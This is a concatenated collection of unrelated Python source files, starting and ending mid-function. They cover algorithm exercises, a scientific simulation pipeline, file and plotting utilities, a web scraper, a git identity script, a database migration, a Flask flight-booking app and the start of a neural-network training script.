                        rightPeak = 0
                if deltas[i] > 0:
                    matched = True
                    if A[i] >= leftPeak:
                        # Found a bar at least as tall as the left peak:
                        # close the basin and restart from here.
                        rightPeak = A[i]
                        rightPeakIdx = i
                        acc = acc + self.computeTrap(A[leftPeakIdx:(rightPeakIdx + 1)], min(leftPeak, rightPeak))
                        leftPeak = rightPeak
                        leftPeakIdx = rightPeakIdx
                        rightPeak = 0
                    elif A[i] < leftPeak:
                        # Track the tallest right-side candidate so far.
                        if (A[i] > rightPeak):
                            rightPeak = A[i]
                            rightPeakIdx = i
                        if i == (l - 1):
                            # End of array: close the basin with the best
                            # right candidate.
                            acc = acc + self.computeTrap(A[leftPeakIdx:(rightPeakIdx + 1)], min(leftPeak, rightPeak))
                            leftPeak = rightPeak
                            leftPeakIdx = rightPeakIdx
            if matched:
                matched = False
                acc = acc + self.computeTrap(A[leftPeakIdx:(rightPeakIdx + 1)], min(leftPeak, rightPeak))
                leftPeakIdx = rightPeakIdx
            else:
                leftPeakIdx = leftPeakIdx + 1
        return acc
|
#!/usr/bin/env python3
from . import tshark
def get_result(input_files, filter, format, output_file):
    """Build one tshark command per input capture file.

    Returns ``{'commands': [...]}`` with the commands in input order.
    """
    commands = [
        tshark.make_tshark_command(capture, filter, format, output_file)
        for capture in input_files
    ]
    return {'commands': commands}
|
"""
Pipeline to generate ascii files of the MW particles, LMC bound particles and
MW+LMC unbound particles
author: github/jngaravitoc
12/2019
Code Features:
- Compute BFE expansion from a collection of snapshots
- It separates a satellite galaxy from a host galaxy
- Compute COM of satellite and host galaxy
- Compute bound and satellite unbound particles
- Run in parallel
TODO:
Implement all input parameters:
- Make a parameter file
Implement all optional outputs:
- random halo sample
- output ascii files
- what if the COM is provided? **
- use ids to track bound - unbound particles -- think about cosmo
zooms
- track bound mass fraction *
Implement checks:
- equal mass particles (DONE)
- com accuracy check
- BFE monopole term amplitude -- compute nmax=20, lmax=0 and check
larger term is 000
Implement tests for every function**
Implement parallel computation for bound satellite particles.
* : fast to implement
** : may need some time to implement
- known issues:
- currently multiprocessing return the following error when many
particles are used:
struct.error: 'i' format requires -2147483648 <= number <= 2147483647
This is a known issue of multiprocessing that apparently is solved in
python3.8
see :
https://stackoverflow.com/questions/47776486/python-struct-error-i-format-requires-2147483648-number-2147483647
"""
import numpy as np
import sys
import schwimmbad
import LMC_bounded as lmcb
import gadget_to_ascii as g2a
import reading_snapshots as reads
import coeff_parallel as cop
from argparse import ArgumentParser
def main(pool, nmax, lmax, r_s, var=True):
    """Compute BFE coefficients in parallel over all (n, l, m) tasks.

    NOTE(review): reads the module-level globals ``pos`` and ``mass`` that
    the __main__ block assigns immediately before calling this function --
    consider passing them explicitly.
    """
    worker = cop.Coeff_parallel(pos, mass, r_s, var)
    tasks = cop.nlm_list(nmax, lmax)
    results = pool.map(worker, tasks)
    pool.close()
    return results
if __name__ == "__main__":
    #snap_names = ["MWLMC3_100M_new_b0_090",
    # "MWLMC3_100M_new_b1_091",
    # "MWLMC4_100M_new_b0_114",
    # "MWLMC4_100M_new_b1_115",
    # "MWLMC5_100M_new_b1_110",
    # "MWLMC5_100M_new_b0_109",
    # "MWLMC6_100M_new_b0_2_113",
    # "MWLMC6_100M_new_b1_2_114"]
    # NOTE(review): every positional help string below was copy-pasted from
    # --ncores and does not describe its argument.
    parser = ArgumentParser(description="")
    parser.add_argument(dest="in_path", default="",
                        type=str, help="Number of processes (uses multiprocessing.)")
    parser.add_argument(dest="snapname", default="",
                        type=str, help="Number of processes (uses multiprocessing.)")
    parser.add_argument(dest="out_name", default="",
                        type=str, help="Number of processes (uses multiprocessing.)")
    parser.add_argument(dest="nmax", default="",
                        type=int, help="Number of processes (uses multiprocessing.)")
    parser.add_argument(dest="lmax", default="",
                        type=int, help="Number of processes (uses multiprocessing.)")
    parser.add_argument(dest="rs", default="",
                        type=float, help="Number of processes (uses multiprocessing.)")
    parser.add_argument(dest="n_halo_part", default="",
                        type=int, help="Number of processes (uses multiprocessing.)")
    group = parser.add_mutually_exclusive_group()
    group.add_argument("--ncores", dest="n_cores", default=1,
                       type=int, help="Number of processes (uses multiprocessing.)")
    group.add_argument("--mpi", dest="mpi", default=False,
                       action="store_true", help="Run with MPI.")
    args = parser.parse_args()
    # Echo the parsed arguments (args.nmax is printed twice in the original).
    print(args.in_path)
    print(args.snapname)
    print(args.out_name)
    print(args.nmax)
    print(args.nmax)
    print(args.lmax)
    print(args.rs)
    print(args.n_halo_part)
    print(args.n_cores)
    print(args.mpi)
    # Hard-coded run parameters.
    npart_sample = 1000000
    #n_part_sample_sat = 1000000
    rcut_halo = 400
    sample = 0
    sample_lmc = 0
    init_snap=91
    final_snap=92
    snaps_ascii=False
    #for i in range(0, len(snap_names)):
    for i in range(init_snap, final_snap):
        print("**************************")
        print("Computing ascii files on snapshot {}".format(i))
        halo = reads.read_snap_coordinates(args.in_path, args.snapname+"{:03d}".format(i), args.n_halo_part, com_frame='MW', galaxy='MW')
        # read_snap_coordinates returns pos, vel, pot, mass
        pos_halo_tr, vel_halo_tr, mass_tr, ids_tr = g2a.truncate_halo(halo[0], halo[1], halo[3], halo[4], rcut_halo)
        pos_halo_tr, vel_halo_tr, mass_tr = g2a.sample_halo(pos_halo_tr, vel_halo_tr, mass_tr, npart_sample)
        #satellite = reads.read_snap_coordinates(args.in_path, args.snapname+"{:03d}".format(i), args.n_halo_part, com_frame='sat', galaxy='sat')
        #pos_sat_tr, vel_sat_tr, mass_sat_tr, ids_sat_tr = g2a.truncate_halo(satellite[0], satellite[1], satellite[3], satellite[4], rcut_halo)
        #pos_sat_em, vel_sat_em, mass_sat_em, ids_sat_em = g2a.npart_satellite(pos_sat_tr, vel_sat_tr, ids_sat_tr, mass_sat_tr[0], mass_tr[0])
        # NOTE(review): the triple-quoted string below is dead code -- the
        # whole satellite bound/unbound pipeline is disabled by being wrapped
        # in a bare string literal.
        """
        assert np.abs(mass_sat_em[0]/mass_tr[0]-1)<1E-3, 'Error: particle mass of satellite different to particle mass of the halo'
        # Outs:
        if snaps_ascii==True:
            out_snap_host = 'MW_{}_{}'.format(int(len(pos_halo_tr)/1E6), snapname+"{}".format(i))
            out_snap_sat= 'LMC_{}_{}'.format(int(len(pos_sat_em)/1E6), snapname+"{}".format(i))
            #write_log([n_halo_part, halo[3][0], len(pos_sample), mass_sample], [len(pos_sat_tr[0]), satellite[3][0], len(pos_sat_em), mass_sat_em])
            write_snap_txt(out_path_MW, out_snap_host, pos_halo_tr, vel_halo_tr, mass_tr, ids_tr)
            write_snap_txt(out_path_LMC, out_snap_sat, pos_sat_em, vel_sat_em, mass_sat_em, ids_sat_em)
            #write_snap_txt(out_path_LMC, out_snap_sat, satellite[0], satellite[1], satellite[3], satellite[4])
        # Satellite bound particles
        #pos, vel, mass, ids = reading_particles(snapname)
        # TODO: parallelize this part!
        print('Computing bound particles!')
        armadillo = lmcb.find_bound_particles(pos_sat_em, vel_sat_em, mass_sat_em, ids_sat_em, args.rs, args.nmax, args.lmax)
        print('Bound particles computed')
        pos_bound = armadillo[0]
        vel_bound = armadillo[1]
        N_bound = armadillo[2]
        ids_bound = armadillo[3]
        pos_unbound = armadillo[4]
        vel_unbound = armadillo[5]
        ids_unbound = armadillo[6]
        lmc_bound = np.array([pos_bound[:,0], pos_bound[:,1], pos_bound[:,2],
                              vel_bound[:,0], vel_bound[:,1], vel_bound[:,2],
                              ids_bound]).T
        lmc_unbound = np.array([pos_unbound[:,0], pos_unbound[:,1], pos_unbound[:,2],
                                vel_unbound[:,0], vel_unbound[:,1], vel_unbound[:,2],
                                ids_unbound]).T
        print('Combining satellite unbound particles with host particles')
        pos_host_sat = np.vstack((pos_halo_tr, pos_unbound))
        vel_host_sat = np.vstack((vel_halo_tr, vel_unbound))
        #ids_host_sat = np.hstack((ids_halo_tr, ids_unbound))
        #fbound_mass = len(pos_sat)
        mass_array = np.ones(len(pos_host_sat[:,0]))*mass_sat_em[0]
        print(mass_array[0])
        mw_lmc_unbound = np.array([pos_host_sat[:,0], pos_host_sat[:,1], pos_host_sat[:,2],
                                   vel_host_sat[:,0], vel_host_sat[:,1], vel_host_sat[:,2],
                                   mass_array]).T
        ## TODO: include out_path
        np.savetxt(args.out_name, lmc_bound)
        print('Done writing snapshot with satellite bounded particles')
        np.savetxt("unbound"+args.out_name, mw_lmc_unbound)
        print('Done writing snapshot with satellite unbounded particles')
        ## Run bfe here!
        ## TODO: quick test run BFE with lmax=0 and nmax=20 to check that the first term is the largest
        """
        pool = schwimmbad.choose_pool(mpi=args.mpi,
                                      processes=args.n_cores)
        #results = cop.main(pool, pos_host_sat, mass_array, args.nmax, args.lmax, args.rs, var=True)
        # Globals consumed by main() defined above.
        pos = pos_halo_tr
        mass = mass_tr
        results = main(pool, args.nmax, args.lmax, args.rs, var=True)
        #cop.write_coefficients("test_coefficients.txt", Snlm, varSnlm, Tnlm, varTnlm, varSTnlm, args.nmax, args.lmax, args.rs)
|
# https://www.codewars.com/kata/58ba6fece3614ba7c200017f
def is_palindrome_1(number):
    """Return True when ``number`` is a non-negative int whose digits read
    the same backwards; 'Not valid' for any other input (including bool)."""
    if type(number) != int or number < 0:
        return 'Not valid'
    digits = str(number)
    return digits == digits[::-1]
# return str(num) == str(num)[::-1] if type(num) == int and num > 0 else "Not valid"
# print(is_palindrome('5'))
# print(is_palindrome(5))
# print(is_palindrome(53))
# print(is_palindrome(535))
# https://www.codewars.com/kata/numerical-palindrome-number-1-dot-5
# For this kata, single digit numbers will not be considered numerical palindromes
def palindrome_seq(num, k):
    """Return the first ``k`` numerical palindromes >= max(num, 11).

    Single-digit numbers are never palindromes here (search starts at 11).
    'Not valid' for non-int or negative inputs; type() is used deliberately
    so that bools are rejected as well.
    """
    if type(num) != int or type(k) != int or num < 0 or k < 0:
        return 'Not valid'
    found = []
    candidate = max(num, 11)
    while k > 0:
        text = str(candidate)
        if text == text[::-1]:
            found.append(candidate)
            k -= 1
        candidate += 1
    return found
# Ad-hoc demonstration calls.
print(palindrome_seq(6, 4))  # [11, 22, 33, 44]
print(palindrome_seq(59, 3))  # [66, 77, 88]
print(palindrome_seq(1221, "8"))  # 'Not valid' (k is not an int)
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 5 19:03:18 2015
@author: lucas
"""
import os
import codecs
from dominio.entidades import Documento
# REVISADO EM 11-09-2015
class ArquivoUtil(object):
    """File helpers: reading raw documents, loading the stopword list and
    persisting processed documents."""

    @staticmethod
    def ler_documentos(documentos_path, categoria):
        """Read every '.txt' file in ``documentos_path`` and wrap each one in
        a ``Documento`` tagged with ``categoria``."""
        documentos = []
        for nome_documento in os.listdir(documentos_path):
            if not nome_documento.endswith('.txt'):
                continue
            with codecs.open(documentos_path + '/' + nome_documento, 'r', 'utf-8') as f:
                texto = f.read()
            documentos.append(Documento(texto, categoria, None, nome_documento))
        return documentos

    @staticmethod
    def get_stoplist():
        """Load the Portuguese stopword list, one word per line."""
        stoplist_f = "/home/lucas/Documents/mineracao_opiniao/dicionario_palavras/stoplist_portugues.txt"
        with codecs.open(stoplist_f, 'r', 'utf-8') as f:
            linhas = f.readlines()
        # Strip the trailing newline from every word.
        return [stopword.rstrip("\n") for stopword in linhas]

    @staticmethod
    def gravar_documento_processado(documento, diretorio_destino):
        """Write the processed document's text into the destination directory
        under the document's own name; returns True on completion."""
        destino = diretorio_destino + "/" + documento.nome
        with codecs.open(destino, 'w', 'utf-8') as f:
            f.write(documento.texto)
        return True
|
"""
General utilities used within saucebrush that may be useful elsewhere.
"""
def get_django_model(dj_settings, app_label, model_name):
    """
    Get a django model given a settings file, app label, and model name.

    NOTE(review): relies on legacy Django APIs -- the flat DATABASE_*
    settings (pre-1.2 style) and django.db.models.get_model (removed in
    Django 1.9); confirm the targeted Django version before reuse.
    """
    from django.conf import settings
    # Only configure once per process; presumably guards against Django's
    # "settings already configured" error on repeated calls.
    if not settings.configured:
        settings.configure(DATABASE_ENGINE=dj_settings.DATABASE_ENGINE,
                           DATABASE_NAME=dj_settings.DATABASE_NAME,
                           DATABASE_USER=dj_settings.DATABASE_USER,
                           DATABASE_PASSWORD=dj_settings.DATABASE_PASSWORD,
                           DATABASE_HOST=dj_settings.DATABASE_HOST,
                           INSTALLED_APPS=dj_settings.INSTALLED_APPS)
    from django.db.models import get_model
    return get_model(app_label, model_name)
def string_dig(element, separator=''):
    """
    Dig into BeautifulSoup HTML elements looking for inner strings.

    If element resembled: <p><b>test</b><em>test</em></p>
    then string_dig(element, '~') would return test~test
    """
    if element.string:
        return element.string
    else:
        # Bug fix: propagate separator into the recursive call; previously
        # nested levels were always joined with the default '', so the
        # docstring's 'test~test' example could not be produced for nested
        # structures.
        return separator.join([string_dig(child, separator)
                               for child in element.findAll(True)])
def flatten(item, prefix='', separator='_', keys=None):
    """
    Flatten nested dictionary into one with its keys concatenated together.

    >>> flatten({'a':1, 'b':{'c':2}, 'd':[{'e':{'r':7}}, {'e':5}],
    'f':{'g':{'h':6}}})
    {'a': 1, 'b_c': 2, 'd': [{'e_r': 7}, {'e': 5}], 'f_g_h': 6}

    NOTE(review): with the list/tuple branch commented out below, lists hit
    the leaf branch and are stored unflattened, so the 'd' part of the
    docstring example no longer matches actual behaviour.
    """
    # update dictionaries recursively
    if isinstance(item, dict):
        # don't prepend a leading _
        if prefix != '':
            prefix += separator
        retval = {}
        for key, value in item.iteritems():
            if (not keys) or (key in keys):
                retval.update(flatten(value, prefix + key, separator, keys))
            else:
                retval[prefix + key] = value
        return retval
    #elif isinstance(item, (tuple, list)):
    #    return {prefix: [flatten(i, prefix, separator, keys) for i in item]}
    else:
        # Python 2 module (iteritems above, print statement below); this
        # debug print fires for every non-dict leaf.
        print item, prefix
        return {prefix: item}
def str_or_list(obj):
    """Wrap a bare string in a single-element list; pass anything else
    through untouched."""
    return [obj] if isinstance(obj, str) else obj
#
# utility classes
#
class Files(object):
    """Iterate over the lines of several files as one stream.

    Missing paths are skipped silently; ``file_open_callback`` (if set) is
    invoked with each path just before that file is opened.
    """

    def __init__(self, *args):
        self.paths = []
        for arg in args:
            self.add(arg)
        self.file_open_callback = None

    def add(self, path):
        """Append another path to the iteration list."""
        self.paths.append(path)

    def __iter__(self):
        return self.linereader()

    def linereader(self):
        """Generator yielding every line of every existing path, in order."""
        import os
        for path in self.paths:
            if not os.path.exists(path):
                continue
            if self.file_open_callback:
                self.file_open_callback(path)
            handle = open(path)
            for line in handle:
                yield line
            handle.close()
|
#!/bin/python
#-*- coding: utf-8 -*-
import os,shutil,sys
import numpy as np
import pylab as pl
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
# Python 2 plotting script: mean-reciprocal-rank curves per (interest,
# cluster) configuration, compared against GMM/average baselines.
x=[1,10,20,30,40,50,60,70,80,90,100]
interest = [10,15,20]
cluster = [200,500]
y=[]
config = []
# One MRR-vs-input-number curve per (interest k, cluster c) configuration.
for k in interest:
    for c in cluster:
        F = []
        for i in x:
            root = 'rec_origine/rec_' + str(i) + '/loc/'
            pro = os.listdir(root)
            score = 0
            precision = 0
            recall = 0
            #print pro
            for j in pro:
                #print j[len(j)-4:len(j)]
                if j == 'loc' or j[len(j)-4:len(j)] == '.txt':
                    continue
                path = root + j + '/' + str(k) + '_' + str(c) + '/simcity.txt'
                count = 1
                # Reciprocal rank: 1/position of j in its own ranking file.
                with open(path) as f:
                    for line in f:
                        if line.strip() == j:
                            score += 1/float(count)
                            break
                        count += 1
            # Mean over the 34 profiles (hard-coded count).
            F.append(score/34)
        F.sort()
        y.append(F)
        config.append([k,c])
# Baseline curves: two GMM variants and an average, one per line of the file.
GA=[]
with open('GMM_avg.txt') as ga:
    for line in ga:
        temp = np.array([float(e) for e in line.strip().split(', ')])
        GA.append(temp)
marker = ['s','p','*','h','D','H']
color = ['b','g','r','c','m','y']
line = ['-','--']
for p in xrange(len(y)):
    pl.plot(x,y[p], marker =marker[p],color = color[p],label=str(config[p]))
pl.plot(x,GA[0],'--',label='GMM_200')
pl.plot(x,GA[1],'--',label='GMM_500')
pl.plot(x,GA[2],'-.',label='avg')
pl.legend(loc = 'upper left',ncol = 3)
pl.title('Retrieval accuracy')
pl.xlabel('Input number')
pl.ylabel('Mean reciprocal ranking')
pl.xlim(0,100)
pl.ylim(0,0.6)
pl.grid(True)
pl.savefig('mrr.jpg')
pl.close()
'''
plt.bar(x,F,alpha = .5, color = 'r')
plt.title('Distribution of F-score over numbers of input images')
plt.xlabel('Input number')
plt.ylabel('F-score')
plt.xlim(0,100)
plt.ylim(0,F[len(y)-1])
plt.savefig('Fscore.jpg')
plt.close()
'''
'''
for p in xrange(len(pro)):
print pro[p]
if os.path.exists('../loc/'+pro[p]):
shutil.rmtree('../loc/'+pro[p])
os.mkdir('../loc/'+pro[p])
os.mkdir('../loc/'+pro[p]+'/dis/')
for i in xrange(len(ref)):
temp = 0
for k in xrange(len(ref[i])):
temp += (new[p][k] - ref[i][k]) * (new[p][k] - ref[i][k])
dis.append([temp,refpro[i],i])
dis.sort()
x = []
for i in xrange(20):
x.append(i)
with open('../loc/'+pro[p]+'/simcity.txt','w') as w:
for i in xrange(len(pro)):
#print dis[i][1]
plot1 = pl.plot(x,ref[dis[i][2]],'r*-',label='reference')
plot2 = pl.plot(x,new[p],'b*-',label='input')
pl.title('Probility in terms of interest')
pl.xlabel('interests')
pl.ylabel('probility')
pl.xlim(0,10)
pl.ylim(0,1)
pl.legend()
pl.savefig('../loc/'+pro[p]+'/dis/' + str(dis[i][1]) + '.jpg')
pl.close()
w.write(str(dis[i][1]) + '\n')
dis = []
x = []
'''
|
# --*--coding: utf-8--*--
# @Time: 2021/2/15
# @Author: Leander
# @File: 06 daemon threads
# from threading import Thread
# import time
#
# def task(name):
#     print(f'{name} is running')
#     time.sleep(1)
#     print(f'{name} is over')
#
# if __name__ == '__main__':
#     t = Thread(target=task, args=('egon',))
#     t.daemon = True
#     t.start()
#     print('主')
"""
The main thread does not end the process the moment it finishes: it waits for
every other non-daemon child thread to finish first, because the end of the
main thread means the end of the whole process.
"""
# A slightly tricky example: t1 is a daemon, but the non-daemon t2 keeps the
# process alive ~3s, so t1 (1s of work) still gets to print 'end123'.
from threading import Thread
import time
def foo():
    print(123)
    time.sleep(1)
    print('end123')
def func():
    print(456)
    time.sleep(3)
    print('end456')
if __name__ == '__main__':
    t1 = Thread(target=foo)
    t2 = Thread(target=func)
    # daemon threads are killed once all non-daemon threads have finished
    t1.daemon = True
    t1.start()
    t2.start()
    print('主')
# device only changes the color when the slide switch is in the ON position
import time
import board
import neopixel
from digitalio import DigitalInOut, Direction, Pull
# all ten onboard NeoPixels (CircuitPython board, e.g. Circuit Playground)
pixels = neopixel.NeoPixel(board.NEOPIXEL, 10)
button_a = DigitalInOut(board.BUTTON_A)
button_a.direction = Direction.INPUT
button_a.pull = Pull.DOWN
buttona_pre = button_a.value  # previous state, for edge detection
button_b = DigitalInOut(board.BUTTON_B)
button_b.direction = Direction.INPUT
button_b.pull = Pull.DOWN
buttonb_pre = button_b.value
switch = DigitalInOut(board.SLIDE_SWITCH)
switch.direction = Direction.INPUT
switch.pull = Pull.UP
# NOTE(review): the value sampled at boot is treated as the OFF position --
# assumes the switch starts OFF; confirm intended behaviour
switch_off = switch.value
ORANGE = (255, 128, 0)
BLUE = (0, 0, 255)
color = BLUE
while True:
    if switch.value != switch_off:
        # switch ON: a rising edge on A selects orange, on B selects blue
        if button_a.value != buttona_pre:
            buttona_pre = button_a.value
            if button_a.value:
                color = ORANGE
        if button_b.value != buttonb_pre:
            buttonb_pre = button_b.value
            if button_b.value:
                color = BLUE
        pixels.fill(color)
    else:
        # switch OFF: blank all pixels
        pixels.fill(0)
|
import externalapi
def compute(x, y):
    """Return the square root of the sum of the remotely computed values of x and y."""
    total = externalapi.remote_compute(x) + externalapi.remote_compute(y)
    return total ** 0.5
|
from urllib.request import Request, urlopen
from bs4 import BeautifulSoup
import pandas as pd
# Scrape the Bauru job-listings page; a User-Agent header is required
# (a plain urlopen gets HTTP 403, see note below).
req = Request('https://www.bauruempregos.com.br/home/vagas', headers={'User-Agent': 'Mozilla/5.0'})
html = urlopen(req)#.read()
#html=urlopen('https://www.bauruempregos.com.br/home/vagas') does not work, raises error 403
#print(html.read())
soup=BeautifulSoup(html.read(),'html.parser')
# the page interleaves date-header divs and job divs with these classes
vagas=soup.find_all("div", class_=["vaga","data-vagas"])
datas={}
dictname=""
for item in vagas:
    #print(item)
    if item.a: # if the div contains a link it is a job entry, not a date header
        nomevaga=str(item.a.string).strip()
        if "[ANÚNCIO ENCERRADO]" not in nomevaga:
            #vagas.pop(item)
            print(nomevaga)
            # NOTE(review): raises KeyError if a job div precedes the first
            # date header (dictname still "") -- relies on page ordering
            datas[dictname].append(nomevaga)
        #else:
        #    print (nomevaga)
    else:
        # date header: start a new bucket keyed by the date text
        print("\n ---------------------------\n")
        print(f"ITENS DO DIA {item.string} ")
        print("\n ---------------------------\n")
        dictname=item.string
        datas[dictname]=[]
# Closed listings are filtered out above ^
print(datas)
print("----------")
# NOTE(review): hard-coded date -- fails with KeyError on any other day's page
print(datas['31/07/2021'])
#else:
#    print(nomevaga)
#    print("mudar aqui")
#import csv
#arquivo=open("bauruempregos.csv","w")
#arquivo.close()
# flatten {date: [jobs]} into [job, date] rows and dump to CSV
final_data=[]
for dia,vagas in datas.items():
    for vaga in vagas:
        final_data.append([vaga,dia])
data_frame = pd.DataFrame.from_dict(final_data)
data_frame.to_csv (r'dados.csv', index = False, header=False)
|
import subprocess
import os
# Rewrite the current repo's origin URL to use a per-key SSH host alias
# (git@github-<key>:owner/repo) and set the matching user.name/user.email.
ssh = input("Enter your SSH key name: ")
userName = input("Enter your github username: ")
email = input("Enter your github email: ")
#repo = input("Paste in the github repo that you are working on (with owner name!): ")
repo = ""
# capture `git config --get remote.origin.url` into a scratch file
with open("remote_origin_url.txt", "w") as file:
    #create the file
    subprocess.run(["git", "config", "--get", "remote.origin.url"], stdout = file)
# NOTE(review): url_file is never closed -- consider a `with` block
url_file = open("remote_origin_url.txt", "r")
if url_file.mode == 'r':
    url = url_file.read()
    # strip scheme/host, keeping "owner/repo(.git)"
    if "https://" in url:
        githubSubstring = "https://github.com/"
        repo = url[len(githubSubstring)::]
    else:
        # SSH form: git@github.com:owner/repo.git
        repo = url[url.find(':') + 1::]
repo = repo.rstrip("\n")
# host alias github-<ssh> is expected to exist in ~/.ssh/config
fullString = "git@github-" + ssh + ":" + repo
subprocess.run(["git", "remote", "set-url", "origin", fullString])
subprocess.run(["git", "config", "--replace-all", "user.name", userName])
subprocess.run(["git", "config", "--global", "--replace-all", "user.name", userName])
subprocess.run(["git", "config", "--replace-all", "user.email", email])
subprocess.run(["git", "config", "--global", "--replace-all", "user.email", email])
subprocess.run(["git", "remote", "-v"])
import sys
def compareX(elem):
    """Sort key: the first coordinate (x) of a point."""
    first, *_rest = elem
    return first
pos = []
# Read in data: first line N, then N "x y" pairs
f = open('./input.txt')
for idx, line in enumerate(f):
    line = line.rstrip('\n')
    # print(line)
    if idx == 0:
        N = int(line)
    else:
        x, y = line.split()
        pos.append([int(x), int(y)])
# print (pos)
# visit[i] stays 1 only for non-dominated points
# (no other point has BOTH coordinates strictly larger); O(N^2) scan
visit = [1] * N
results = []
for i in range(N):
    # if visit[i] == 0:
    #     continue
    x1 = pos[i][0]
    y1 = pos[i][1]
    for j in range(N):
        # if i == j:
        #     break
        x2 = pos[j][0]
        y2 = pos[j][1]
        if x2>x1 and y2>y1:
            # print ('I am here')
            visit[i] = 0  # point i is dominated by point j
            break
    if visit[i] == 1:
        results.append([pos[i][0], pos[i][1]])
# for i in range(N):
#     if visit[i] == 1:
#         print (pos[i][0], pos[i][1])
# print surviving points in increasing x order
results.sort(key=compareX)
for r in results:
    print (r[0], r[1])
f.close()
from django.contrib import admin
from .models.user import User
from .models.account import Account
# Expose the custom User and Account models in the Django admin site.
admin.site.register(User)
admin.site.register(Account)
# Copyright 2015 Ericsson AB
# Copyright (c) 2015 Gigamon
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Initial schema operations for Tap-as-a-Service service plugin
from alembic import op
import sqlalchemy as sa
direction_types = sa.Enum('IN', 'OUT', 'BOTH', name='tapflows_direction')
def upgrade():
    """Create the initial Tap-as-a-Service tables.

    tap_services: mirror destinations (one destination port per service).
    tap_flows: mirrored source ports, cascade-deleted with their service.
    tap_id_associations: maps a tap service to an auto-incrementing TaaS id.
    """
    op.create_table(
        'tap_services',
        sa.Column('id', sa.String(length=36), primary_key=True,
                  nullable=False),
        sa.Column('tenant_id', sa.String(length=255), nullable=True),
        sa.Column('name', sa.String(length=255), nullable=True),
        sa.Column('description', sa.String(length=1024), nullable=True),
        sa.Column('port_id', sa.String(36), nullable=False),
        sa.Column('network_id', sa.String(36), nullable=True))
    op.create_table(
        'tap_flows',
        sa.Column('id', sa.String(length=36), primary_key=True,
                  nullable=False),
        sa.Column('tenant_id', sa.String(length=255), nullable=True),
        sa.Column('name', sa.String(length=255), nullable=True),
        sa.Column('description', sa.String(length=1024), nullable=True),
        # deleting a tap service removes its flows
        sa.Column('tap_service_id', sa.String(length=36),
                  sa.ForeignKey("tap_services.id",
                                ondelete="CASCADE"), nullable=False),
        sa.Column('source_port', sa.String(length=36), nullable=False),
        sa.Column('direction', direction_types, nullable=False))
    op.create_table(
        'tap_id_associations',
        sa.Column('tap_service_id', sa.String(length=36)),
        sa.Column('taas_id', sa.INTEGER, primary_key=True, autoincrement=True))
|
import os
from flask import jsonify
from flask import Flask, render_template, request
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
app = Flask(__name__)
# Windows-style absolute path to the SQLite database
DATABASE_URL = 'sqlite:///C:/sqlitedatabase/test1.db';
engine = create_engine((DATABASE_URL))
# thread-local session shared by all request handlers
db = scoped_session(sessionmaker(bind=engine))
@app.route("/")
def index():
    # Home page: list every flight.
    flights = db.execute("SELECT * FROM flights").fetchall()
    return render_template("home.html", flights=flights)
@app.route("/flightbooking")
def flightbooking():
    # Booking form, populated with the available flights.
    flights1 = db.execute("SELECT * FROM flights").fetchall()
    return render_template("booking.html", flights1 = flights1)
@app.route("/book", methods=['POST'])
def book():
    """Book Flight"""
    name = request.form.get("name")
    # reject non-numeric flight ids up front
    try:
        flight_id = int(request.form.get("flight_id"))
    except ValueError:
        return render_template("error.html", message="Invalid Flight Number")
    # verify the flight exists before inserting the passenger
    if db.execute("SELECT * FROM flights WHERE id=:id", {"id":flight_id}).rowcount ==0:
        return render_template("error.html", message='No Such Flight with this Id')
    db.execute("INSERT INTO passengers(name, flight_id) VALUES(:name, :flight_id)",
               {'name':name, 'flight_id':flight_id})
    db.commit()
    return render_template("success.html")
@app.route('/flights')
def flights():
    """ List of all flights"""
    flights = db.execute("SELECT * FROM flights").fetchall()
    return render_template("flights.html", flights=flights)
@app.route('/flights/<int:flight_id>')
def flight(flight_id):
    """ List Details about single flight"""
    flight = db.execute("SELECT * FROM flights WHERE id =:id",{'id':flight_id}).fetchone()
    if flight is None:
        return render_template("error.html", message='No such flight')
    passengers = db.execute("SELECT name FROM passengers WHERE flight_id= :flight_id",
                            {"flight_id": flight_id}).fetchall()
    return render_template("flightdetail.html", flight=flight, passengers=passengers)
@app.route("/api/flights/<int:flight_id>")
def flight_api(flight_id):
    """Return Detail about a single flight"""
    # make sure flight exists.
    flight = db.execute("SELECT * FROM flights WHERE id =:id", {'id': flight_id}).fetchone()
    if flight is None:
        # 422 Unprocessable Entity for an unknown id
        return jsonify({"error": "Invalid flight_id"}), 422
    # Get all passengers
    passengers = db.execute("SELECT name FROM passengers WHERE flight_id= :flight_id",
                            {"flight_id": flight_id}).fetchall()
    names=[]
    for passenger in passengers:
        names.append(passenger.name)
    data = {
        "origin": flight.origin,
        "destination":flight.destination,
        "duration": flight.duration,
        "passengers": names
    }
    return jsonify(data)
|
import pickle
import numpy as np
from nn import NN
from image import pre_process, augment
import tensorflow as tf
import itertools
import time
from sklearn.utils import shuffle
import pandas as pd
import cv2
training_file = "data/train.p"
validation_file = "data/valid.p"
testing_file = "data/test.p"
# pickled datasets: dicts with 'features' (images) and 'labels'
with open(training_file, mode='rb') as f:
    train = pickle.load(f)
with open(validation_file, mode='rb') as f:
    valid = pickle.load(f)
with open(testing_file, mode='rb') as f:
    test = pickle.load(f)
X_train, y_train = train['features'], train['labels']
X_valid, y_valid = valid['features'], valid['labels']
X_test, y_test = test['features'], test['labels']
# augmented copies of the training set, shuffled so batches mix classes
aug_X, aug_y = augment(X_train, y_train)
aug_X, aug_y = shuffle(aug_X, aug_y)
# pre_process all splits identically (see image.pre_process)
X_train = pre_process(X_train)
X_valid = pre_process(X_valid)
X_test = pre_process(X_test)
aug_X = pre_process(aug_X)
# Hyperparameters we will iterate over for experiments
data_augmentation = [str(True), str(False)]
batch_sizes = [32, 64, 128]
dropout_keep_prob = [0.4, 0.5, 0.6]
config = [0, 1]  # index into the two architectures in create_network_config
filters = [[16, 32], [32, 64], [64, 128]]
ksize = [[1, 1], [2, 2], [3, 3], [4, 4]]
def create_network_config(index, filters, ksize):
    """Return one of two CNN layer configurations.

    index 0: two conv/pool/relu stages; index 1: a single conv/relu/pool stage.
    filters -- [first_conv_filters, second_conv_filters]; ksize -- conv kernel size.
    Both share the same fully-connected head (128 units, dropout, 43 classes).
    """
    def conv(n_filters):
